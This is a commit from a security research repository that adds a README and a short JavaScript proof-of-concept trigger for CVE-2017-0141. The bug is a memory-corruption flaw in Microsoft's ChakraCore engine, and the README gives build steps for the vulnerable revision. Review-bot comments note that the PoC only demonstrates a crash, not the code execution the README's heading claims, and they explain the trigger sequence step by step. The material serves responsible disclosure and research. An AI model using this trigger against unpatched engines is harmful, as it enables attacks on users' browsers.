Commit 4b6a3b8

m-y-mo authored and GitHub Enterprise committed
Merge pull request Semmle#6 from kev/ChakraCore_CVE-2017-0141
Proof-of-concept exploit for CVE-2017-0141
2 parents 77d338a + bb55317 commit 4b6a3b8

2 files changed

Lines changed: 44 additions & 0 deletions

Lines changed: 28 additions & 0 deletions
@@ -0,0 +1,28 @@
1+
# Remote code execution in Microsoft ChakraCore (CVE-2017-0141)
2+
3+
This directory contains a proof of concept exploit for a remote code execution vulnerability in [ChakraCore](https://github.com/Microsoft/ChakraCore), the Javascript engine for Microsoft Edge. The vulnerability was caused by [this pull request](https://github.com/Microsoft/ChakraCore/pull/2196), which was a botched fix for [CVE-2016-7202](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7202). Semmle reported the vulnerability to Microsoft on 2016-12-19. Microsoft assigned it [CVE-2017-0141](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0141) and released a fix on [2017-03-14](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0141).
4+
5+
# Reproduction steps
6+
7+
First you need to build the version of ChakraCore with the vulnerability. On Windows, in a VS2015 [developer command prompt](https://docs.microsoft.com/en-us/dotnet/framework/tools/developer-command-prompt-for-vs), run these commands to download and build the vulnerable revision:
8+
9+
```bat
10+
git clone https://github.com/Microsoft/ChakraCore.git
11+
cd ChakraCore
12+
git checkout eecf271764ce0ee8ea58c2ec9c22bc2dd69861e7 &:: Version with "fix" for CVE-2016-7202
13+
msbuild /t:rebuild /m /p:Platform=x64 /p:Configuration=Release Build\Chakra.Core.sln
14+
```
15+
16+
Note: this revision of ChakraCore is too old to build with VS2017. You need VS2015 or earlier.
17+
18+
If the build was successful, then you can run the exploit like this:
19+
20+
```bat
21+
Build\VcBuild\bin\x64_release\ch.exe cve-2017-0141.js
22+
```
23+
24+
This causes ChakraCore to crash with the following error message:
25+
26+
```
27+
FATAL ERROR: ch.exe failed due to exception code c0000005
28+
```
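Review bot: the heading on the first line of this README claims remote code execution, but the reproduction steps end at a crash with exception code c0000005 (an access violation), so the document should say plainly that the PoC demonstrates the memory-safety defect and not code execution, or describe what further work the RCE claim rests on. The root cause is also undocumented: the text only links to pull request 2196 and to the two CVE entries, so add a short paragraph stating what the earlier "fix" for CVE-2016-7202 failed to cover and why the checked-out revision eecf271764ce0ee8ea58c2ec9c22bc2dd69861e7 is still affected, so a reader can relate the crash to the code change rather than having to reverse it from the diff.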
Lines changed: 16 additions & 0 deletions
@@ -0,0 +1,16 @@
1+
var a = [1];
2+
a.length = 1000;
3+
4+
var o = {};
5+
Object.defineProperty(o, '1', {
6+
get: function() {
7+
for (var i = 0; i < 0x100000; i++) {
8+
a[0x100000 + i] = i;
9+
}
10+
return 2;
11+
}
12+
});
13+
14+
a.__proto__ = o;
15+
16+
var r = [].reverse.call(a);
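Review bot: the script carries no comments, so the trigger sequence is not documented anywhere in the file. `a.length = 1000` leaves every index above 0 as a hole, the getter is defined for property '1' on `o`, and `a.__proto__ = o` places it on the prototype chain, so when `[].reverse.call(a)` reads the missing element at index 1 it runs the getter, whose loop stores to `a[0x100000 + i]` for 0x100000 iterations and grows the array while the reverse is still in progress. Add a header comment saying the file must be run against the vulnerable revision named in the README, and one comment per step (why the hole, why the getter sits on the prototype, what the loop's writes are meant to do to the array's storage), and replace the magic number 0x100000 with a named constant. Style: `var r` is never used, so the final line can be the bare `[].reverse.call(a);` call.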
